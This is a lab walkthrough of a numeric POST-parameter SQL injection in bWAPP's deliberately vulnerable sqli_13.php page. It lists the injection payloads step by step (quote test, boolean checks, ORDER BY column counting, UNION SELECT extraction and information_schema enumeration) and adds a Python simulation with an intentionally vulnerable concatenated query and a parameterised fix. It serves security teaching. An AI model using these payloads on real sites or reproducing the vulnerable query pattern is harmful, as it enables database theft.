1. Look at the POST parameters and construct the request the same way (see screenshot).
2. Enter movie=1' in the HackBar POST box. The error message echoes the fragment with three single quotes: the injected quote wrapped in MySQL's own quoting, which means the value is spliced into the query unquoted, so this should be a numeric injection (see screenshot).
3. Enter movie=1 and 1=1: the page is normal. Enter movie=1 and 1=2: error (see screenshot).
So there is a numeric injection point here.
4. Determine the number of columns:
Enter movie=1 order by 7: normal. Enter movie=1 order by 8: error, so the query returns 7 columns (see screenshot).
Find the displayed positions: enter movie=-1 union select 1,2,3,4,5,6,7 (see screenshot). The marker numbers that appear on the page are the columns whose contents are echoed; the steps below use positions 2, 3 and 5.
5. Query the database name and other information:
Enter movie=-1 union select 1,database(),version(),4,user(),6,7 to view the database name, database version and current user (see screenshot).
6. Query table names:
Enter movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'. The table name blog is shown (see screenshot). Note that the page displays a single row, so only one table name comes back at a time; to see every table in one response use group_concat(table_name) in that slot, or step through the rows with limit 0,1, limit 1,1 and so on.
7. Query column names:
Enter movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='blog'. The column name id is shown (see screenshot); as in step 6, only the first column is displayed, so use group_concat(column_name) to list them all.
8. Query the contents of the column:
Enter movie=-1 union select 1,database(),version(),id,user(),6,7 from blog. Nothing comes back: the blog table holds no rows.
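The whole procedure above, replayed as an added example (not code from the original post or from bWAPP): a Python script that simulates the vulnerable query shape, an unquoted integer spliced into the WHERE clause as the three-quote error in step 2 implies, against an in-memory SQLite database standing in for bWAPP's MySQL backend. Because SQLite has no information_schema, database() or user(), the metadata queries use sqlite_master and sqlite_version() instead; the movies table's columns and rows and the empty blog table are constructed here. It walks the same steps (quote test, and 1=1 / and 1=2 check, ORDER BY column counting, UNION placement, table and column enumeration with group_concat, the empty blog table) and ends with the parameterised query that closes the hole.

```python
"""Simulation of the numeric POST 'movie' injection from the bWAPP sqli_13.php walkthrough.

Added example, not from the original post or from bWAPP. Assumed: the query is
"SELECT * FROM movies WHERE id = <movie>" with the value spliced in unquoted, and
SQLite stands in for MySQL (sqlite_master / sqlite_version() replace
information_schema, database() and user()).
"""
import sqlite3

# Constructed sample data. bWAPP's movies table has 7 columns, matching ORDER BY 7.
COLUMNS = ("id", "title", "release_year", "genre", "main_character", "imdb", "tickets_stock")
SAMPLE_ROWS = [
    (1, "G.I. Joe: Retaliation", "2013", "action", "Cobra Commander", "tt1583421", 100),
    (2, "Iron Man", "2008", "action", "Tony Stark", "tt0371746", 53),
]


def make_db():
    """Stand-in backend: a populated movies table and an empty blog table (as in step 8)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE movies (%s)" % ", ".join(COLUMNS))
    db.executemany("INSERT INTO movies VALUES (?,?,?,?,?,?,?)", SAMPLE_ROWS)
    db.execute("CREATE TABLE blog (id INTEGER, owner TEXT, entry TEXT, date TEXT)")
    db.commit()
    return db


def vulnerable_lookup(db, movie):
    """The hole: the POST value is concatenated unquoted.
    Returns the result rows, or an 'Error: ...' string like the bWAPP page does."""
    try:
        return db.execute("SELECT * FROM movies WHERE id = " + movie).fetchall()
    except sqlite3.Error as exc:
        return "Error: %s" % exc


def safe_lookup(db, movie):
    """The fix: accept only an integer and bind it as a parameter."""
    if not movie.isdigit():
        return []
    return db.execute("SELECT * FROM movies WHERE id = ?", (int(movie),)).fetchall()


def is_error(response):
    return isinstance(response, str)


def looks_numeric_injectable(db):
    """Steps 2-3: a stray quote breaks the query, 'and 1=1' keeps the row, 'and 1=2' drops it."""
    quote_breaks = is_error(vulnerable_lookup(db, "1'"))
    true_rows = vulnerable_lookup(db, "1 and 1=1")
    false_rows = vulnerable_lookup(db, "1 and 1=2")
    return quote_breaks and not is_error(true_rows) and len(true_rows) == 1 and false_rows == []


def count_columns(db, max_cols=20):
    """Step 4: ORDER BY n succeeds up to the column count and errors at n+1."""
    for n in range(1, max_cols + 1):
        if is_error(vulnerable_lookup(db, "1 ORDER BY %d" % n)):
            return n - 1
    return None


def union_payload(ncols, fields):
    """'movie=-1 UNION SELECT ...' with `fields` (1-based slot -> SQL expression) in the
    echoed slots; every other slot keeps its marker number, as in step 4."""
    cols = [fields.get(i, str(i)) for i in range(1, ncols + 1)]
    return "-1 UNION SELECT " + ",".join(cols)


def extract(db, ncols, expr, tail=""):
    """Steps 5-8: put `expr` in visible slot 3 (where version() sat) and read it back.
    `tail` is the optional FROM/WHERE part. Returns None when nothing comes back."""
    payload = union_payload(ncols, {3: expr})
    if tail:
        payload += " " + tail
    rows = vulnerable_lookup(db, payload)
    if is_error(rows) or not rows:
        return None
    return rows[0][2]


def run_walkthrough():
    """Replay the post's steps end to end and return what each one yields."""
    db = make_db()
    ncols = count_columns(db)
    return {
        "injectable": looks_numeric_injectable(db),
        "columns": ncols,
        "version": extract(db, ncols, "sqlite_version()"),
        # group_concat lists every table in one row; a bare name would show only the first.
        "tables": extract(db, ncols, "group_concat(name)", "FROM sqlite_master WHERE type='table'"),
        "blog_ddl": extract(db, ncols, "sql", "FROM sqlite_master WHERE name='blog'"),
        "blog_ids": extract(db, ncols, "group_concat(id)", "FROM blog"),  # None: table is empty
        "fixed_probe": safe_lookup(db, "1 ORDER BY 8"),  # the parameterised version rejects it
    }


if __name__ == "__main__":
    for key, value in run_walkthrough().items():
        print("%-12s %r" % (key, value))
```

Running the script prints one line per step. The fixed lookup returns nothing for every probe string because the value never reaches the SQL text; on the real target the same effect is obtained with a prepared statement and an integer cast on the movie parameter.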
bWAPP SQL injection: sqli_13.php